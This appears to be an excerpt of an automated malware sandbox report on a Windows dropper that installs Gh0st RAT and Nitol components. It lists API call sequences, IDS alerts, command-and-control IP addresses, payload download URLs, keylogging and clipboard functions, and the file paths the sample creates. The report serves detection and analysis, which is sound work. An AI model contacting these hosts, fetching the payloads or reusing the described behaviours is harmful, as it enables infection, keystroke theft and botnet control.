Source: C:\Windows\Temp\server.exe	Code function: 3_2_10008B50 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,??2@YAPAXI@Z,??3@YAXPAX@Z,wsprintfA,FindNextFileA,FindClose,	3_2_10008B50
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10008520 LocalAlloc,wsprintfA,FindFirstFileA,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose,	3_2_10008520
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10008E40 FindFirstFileA,FindClose,FindClose,	3_2_10008E40
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100086F0 wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	3_2_100086F0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10008F00 FindFirstFileA,FindClose,CreateFileA,CloseHandle,	3_2_10008F00
Source: C:\Windows\Temp\ .exe	Code function: 5_2_0045B051 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,	5_2_0045B051
Source: C:\Windows\Temp\ .exe	Code function: 5_2_00405260 FindFirstFileA,GetFileAttributesA,SetFileAttributesA,RemoveDirectoryA,DeleteFileA,FindNextFileA,FindClose,	5_2_00405260
Source: C:\Windows\Temp\ .exe	Code function: 5_2_00439D40 #17,__time32,FindFirstFileA,DeleteFileA,	5_2_00439D40
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10001A20 GetSystemDirectoryA,wsprintfA,wsprintfA,CreateFileA,CloseHandle,Sleep,Sleep,FindFirstFileA,GetCurrentDirectoryA,strstr,Sleep,GetVersionExA,GetSystemDefaultLCID,Sleep,Sleep,GetLocalTime,wsprintfA,_mkdir,Sleep,GetModuleFileNameA,CopyFileA,wsprintfA,wsprintfA,BeginUpdateResourceA,UpdateResourceA,EndUpdateResourceW,CloseHandle,Sleep,ShellExecuteA,Sleep,GetWindowsDirectoryA,wsprintfA,wsprintfA,_mkdir,_mkdir,_mkdir,_mkdir,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,	8_2_10001A20
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10008B50 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,??2@YAPAXI@Z,??3@YAXPAX@Z,wsprintfA,FindNextFileA,FindClose,	8_2_10008B50
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100014B0 GetSystemDirectoryA,FindFirstFileA,CreateFileA,ReadFile,wsprintfA,wsprintfA,CloseHandle,wsprintfA,lstrlen,lstrlen,wsprintfA,lstrlen,	8_2_100014B0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10008520 LocalAlloc,wsprintfA,FindFirstFileA,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose,	8_2_10008520
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10008E40 FindFirstFileA,FindClose,FindClose,	8_2_10008E40
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100086F0 wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	8_2_100086F0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10008F00 FindFirstFileA,FindClose,CreateFileA,CloseHandle,	8_2_10008F00

Source: C:\Windows\Temp\server.exe

3_2_1000AA30

Source: C:\Windows\Temp\ .exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows	Jump to behavior
Source: C:\Windows\Temp\ .exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Windows\Temp\ .exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\History\desktop.ini	Jump to behavior
Source: C:\Windows\Temp\ .exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\Temp\ .exe	File opened: C:\Users\user\AppData\Local\Microsoft	Jump to behavior
Source: C:\Windows\Temp\ .exe	File opened: C:\Users\user	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2013214 - Severity 1 - ET MALWARE Gh0st Remote Access Trojan Encrypted Session To CnC Server : 192.168.2.9:49707 -> 120.48.34.233:8000
Source: Network traffic	Suricata IDS: 2016922 - Severity 1 - ET MALWARE Backdoor family PCRat/Gh0st CnC traffic : 192.168.2.9:49707 -> 120.48.34.233:8000
Source: Network traffic	Suricata IDS: 2048478 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Gh0stRat Keep-Alive : 120.48.34.233:8000 -> 192.168.2.9:49707
Source: Network traffic	Suricata IDS: 2808814 - Severity 1 - ETPRO MALWARE Backdoor family PCRat/Gh0st CnC Response : 120.48.34.233:8000 -> 192.168.2.9:49707
Source: Network traffic	Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49720 -> 8.7.198.46:8090
Source: Network traffic	Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49713 -> 120.48.34.233:8080
Source: Network traffic	Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49774 -> 8.7.198.46:8090
Source: Network traffic	Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49767 -> 120.48.34.233:8080
Source: Network traffic	Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49814 -> 120.48.34.233:8080
Source: Network traffic	Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49820 -> 8.7.198.46:8090
Source: Network traffic	Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49857 -> 120.48.34.233:8080
Source: Network traffic	Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49865 -> 46.82.174.69:8090
Source: Network traffic	Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49901 -> 120.48.34.233:8080
Source: Network traffic	Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49912 -> 46.82.174.69:8090
Source: Network traffic	Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49945 -> 120.48.34.233:8080
Source: Network traffic	Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49956 -> 46.82.174.69:8090
Source: Network traffic	Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49989 -> 120.48.34.233:8080
Source: Network traffic	Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49767 -> 120.48.34.233:8080
Source: Network traffic	Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49857 -> 120.48.34.233:8080
Source: Network traffic	Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49901 -> 120.48.34.233:8080
Source: Network traffic	Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49956 -> 46.82.174.69:8090
Source: Network traffic	Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49865 -> 46.82.174.69:8090
Source: Network traffic	Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49713 -> 120.48.34.233:8080
Source: Network traffic	Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49820 -> 8.7.198.46:8090
Source: Network traffic	Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49989 -> 120.48.34.233:8080
Source: Network traffic	Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49912 -> 46.82.174.69:8090
Source: Network traffic	Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49720 -> 8.7.198.46:8090
Source: Network traffic	Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49774 -> 8.7.198.46:8090
Source: Network traffic	Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49945 -> 120.48.34.233:8080
Source: Network traffic	Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49814 -> 120.48.34.233:8080

Contains functionality to download and execute PE files

Source: C:\Windows\Temp\server.exe

3_2_1000B6F0

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.9:49707 -> 120.48.34.233:8000
Source: global traffic	TCP traffic: 192.168.2.9:49720 -> 8.7.198.46:8090
Source: global traffic	TCP traffic: 192.168.2.9:49865 -> 46.82.174.69:8090

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: CHINANET-BACKBONENo31Jin-rongStreetCN CHINANET-BACKBONENo31Jin-rongStreetCN
Source: Joe Sandbox View	ASN Name: SPRINGSUS SPRINGSUS
Source: Joe Sandbox View	ASN Name: DTAGInternetserviceprovideroperationsDE DTAGInternetserviceprovideroperationsDE

Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\Temp\v5.exe

Code function: 2_2_004036C6 select,__WSAFDIsSet,recv,

2_2_004036C6

Source: global traffic	DNS traffic detected: DNS query: chinagov.8800.org
Source: global traffic	DNS traffic detected: DNS query: www.wk1888.com
Source: global traffic	DNS traffic detected: DNS query: www.af0575.com
Source: global traffic	DNS traffic detected: DNS query: www.fz0575.com

Source: v5.exe, 00000004.00000002.2594829199.0000000000678000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.168.2.1
Source: v5.exe, 00000004.00000003.2558799404.0000000000690000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2558799404.00000000006B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.168.2.1/
Source: v5.exe, 00000004.00000003.1494703239.00000000006B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.168.2.1/1
Source: v5.exe, 00000004.00000003.2237287822.0000000000690000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2013456576.0000000000691000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.168.2.1/VZ
Source: v5.exe, 00000004.00000003.1494703239.00000000006A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.168.2.1/b6
Source: v5.exe, 00000004.00000002.2594829199.0000000000678000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.168.2.1/h
Source: v5.exe, 00000004.00000003.2013456576.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2237287822.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000002.2594829199.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2558799404.00000000006C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.168.2.1:80/
Source: v5.exe, 00000004.00000003.2237287822.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000002.2594829199.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2558799404.00000000006C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.168.2.1:80/4
Source: v5.exe, 00000004.00000003.1561640538.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1494703239.00000000006A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.168.2.1:80/6to4
Source: v5.exe, 00000004.00000003.2237287822.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000002.2594829199.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2558799404.00000000006C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.168.2.1:80/_
Source: v5.exe, 00000004.00000002.2594829199.00000000006C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.168.2.1:80/~
Source: G3izWAY3Fa.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: G3izWAY3Fa.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.af0575.com:2011/1.exe
Source: server.exe, 00000003.00000002.2683900710.0000000000708000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.af0575.com:2011/1.exe8
Source: svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.af0575.com:2011/1.exeb
Source: svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.af0575.com:2011/1.exee
Source: svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.af0575.com:2011/1.exee3
Source: server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.af0575.com:2011/1.exejlt
Source: svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.af0575.com:2011/1.exer
Source: server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.af0575.com:2011/1.exe~l
Source: server.exe, 00000003.00000002.2683900710.000000000067D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2631462911.0000000000812000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fz0575.com:2011/1.exe
Source: server.exe, 00000003.00000002.2683900710.000000000067D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fz0575.com:2011/1.exe-
Source: server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fz0575.com:2011/1.exeNoP
Source: server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fz0575.com:2011/1.exelo~
Source: server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fz0575.com:2011/1.exepoj
Source: svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fz0575.com:2011/1.exer
Source: server.exe, 00000003.00000002.2683900710.0000000000708000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fz0575.com:2011/1.exew
Source: server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.wk1888.com/
Source: svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.wk1888.com:2011/1.exe
Source: svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.wk1888.com:2011/1.exer
Source: server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.wk1888.com:2011/1.exetlV
Source: .exe, 00000005.00000002.2705462292.000000000234B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGY
Source: .exe, 00000005.00000002.2705462292.000000000234B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: server.exe, 00000003.00000002.2683900710.00000000006F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2659797363.0000000000880000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: .exe, 00000005.00000002.2705732452.0000000002550000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000005.00000002.2682490023.00000000006B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: .exe, 00000005.00000002.2682490023.000000000069D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033BKSLMEM
Source: .exe, 00000005.00000002.2682490023.000000000069D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033FYMLMEM
Source: .exe, 00000005.00000002.2705732452.0000000002550000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: .exe, 00000005.00000002.2682490023.000000000071F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3ez

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture and log keystrokes

Source: C:\Windows\Temp\server.exe	Code function: <BackSpace>	3_2_10009A00
Source: C:\Windows\Temp\server.exe	Code function: <Enter>	3_2_10009A00
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: <BackSpace>	8_2_10009A00
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: <Enter>	8_2_10009A00

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe

0_2_00404EB9

Contains functionality to modify clipboard data

Source: C:\Windows\Temp\server.exe	Code function: 3_2_1000FA20 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,		3_2_1000FA20
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1000FA20 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,		8_2_1000FA20

Contains functionality to read the clipboard data

Source: C:\Windows\Temp\server.exe

Code function: 3_2_1000FA90 OpenClipboard,GetClipboardData,CloseClipboard,GlobalSize,GlobalLock,??2@YAPAXI@Z,GlobalUnlock,CloseClipboard,??3@YAXPAX@Z,

3_2_1000FA90

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Windows\Temp\server.exe

Code function: 3_2_10009A00 GetKeyState,Sleep,lstrlen,GetKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,lstrcat,lstrlen,lstrcat,lstrcat,

3_2_10009A00

Potential key logger detected (key state polling based)

Source: C:\Windows\Temp\ .exe

Code function: 5_2_00457B94 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,

5_2_00457B94

E-Banking Fraud

Checks if browser processes are running

Source: C:\Windows\Temp\server.exe	Code function: RegOpenKeyExA,RegQueryValueA,RegCloseKey,Sleep,lstrlen,strstr,lstrcpy,CreateProcessA, Applications\iexplore.exe\shell\open\command		3_2_1000A6B0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: RegOpenKeyExA,RegQueryValueA,RegCloseKey,Sleep,lstrlen,strstr,lstrcpy,CreateProcessA, Applications\iexplore.exe\shell\open\command		8_2_1000A6B0

Too many similar processes found

Source: cmd.exe

Process created: 65

System Summary

Malicious sample detected (through community Yara rule)

Source: dump.pcap, type: PCAP	Matched rule: gh0st Author: https://github.com/jackcr/
Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader Author: Florian Roth
Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects a ZxShell related sample from a CN threat group Author: Florian Roth
Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Nitol Malware Author: Florian Roth
Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader Author: Florian Roth
Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects a ZxShell related sample from a CN threat group Author: Florian Roth
Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Nitol Malware Author: Florian Roth
Source: 00000003.00000002.2681095838.0000000000650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: gh0st Author: https://github.com/jackcr/
Source: 00000003.00000002.2705358503.0000000002A5D000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY	Matched rule: gh0st Author: https://github.com/jackcr/

Contains functionality to call native functions

Source: C:\Windows\Temp\server.exe	Code function: 3_2_10002800 NtdllDefWindowProc_A,		3_2_10002800
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10002800 NtdllDefWindowProc_A,		8_2_10002800

Contains functionality to communicate with device drivers

Source: C:\Windows\Temp\ .exe

Code function: 5_2_0042E150: DeviceIoControl,

5_2_0042E150

Contains functionality to delete services

Source: C:\Windows\Temp\v5.exe

Code function: 2_2_0040351A OpenSCManagerA,OpenServiceA,CloseServiceHandle,DeleteService,CloseServiceHandle,CloseServiceHandle,

2_2_0040351A

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Code function: 0_2_004030CB EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,	0_2_004030CB
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10012010 ExitWindowsEx,	3_2_10012010
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1000B0F0 _strrev,_strrev,_strrev,GetVersionExA,ExitWindowsEx,	3_2_1000B0F0
Source: C:\Windows\Temp\ .exe	Code function: 5_2_0043A500 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,	5_2_0043A500
Source: C:\Windows\Temp\ .exe	Code function: 5_2_0043AD30 MessageBoxA,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,	5_2_0043AD30
Source: C:\Windows\Temp\ .exe	Code function: 5_2_0043ADF0 MessageBoxA,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,	5_2_0043ADF0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10012010 ExitWindowsEx,	8_2_10012010
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1000B0F0 _strrev,_strrev,_strrev,GetVersionExA,ExitWindowsEx,	8_2_1000B0F0

Creates files inside the system directory

Source: C:\Windows\Temp\server.exe	File created: C:\Windows\XXXXXX05CA35CC	Jump to behavior
Source: C:\Windows\Temp\server.exe	File created: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Jump to behavior
Source: C:\Windows\Temp\server.exe	File created: C:\Windows\SysWOW64\05CA35CC	Jump to behavior
Source: C:\Windows\Temp\server.exe	File created: C:\Windows\SysWOW64\033726	Jump to behavior
Source: C:\Windows\Temp\server.exe	File created: C:\Windows\SysWOW64\033726\svchost.exe	Jump to behavior
Source: C:\Windows\Temp\server.exe	File created: C:\Windows\SysWOW64\033726\RCX773C.tmp	Jump to behavior
Source: C:\Windows\Temp\server.exe	File created: C:\Windows\kk	Jump to behavior
Source: C:\Windows\Temp\server.exe	File created: C:\Windows\tt	Jump to behavior
Source: C:\Windows\Temp\server.exe	File created: C:\Windows\bb	Jump to behavior
Source: C:\Windows\SysWOW64\033726\svchost.exe	File created: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==
Source: C:\Windows\SysWOW64\033726\svchost.exe	File created: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
Source: C:\Windows\SysWOW64\033726\svchost.exe	File created: C:\Windows\SysWOW64\034031
Source: C:\Windows\SysWOW64\033726\svchost.exe	File created: C:\Windows\SysWOW64\034031\svchost.exe
Source: C:\Windows\SysWOW64\033726\svchost.exe	File created: C:\Windows\SysWOW64\034031\RCX8B31.tmp

Detected potential crypto function

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Code function: 0_2_004046CA	0_2_004046CA
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Code function: 0_2_00405FA8	0_2_00405FA8
Source: C:\Windows\Temp\v5.exe	Code function: 2_2_00407470	2_2_00407470
Source: C:\Windows\Temp\server.exe	Code function: 3_2_004023C9	3_2_004023C9
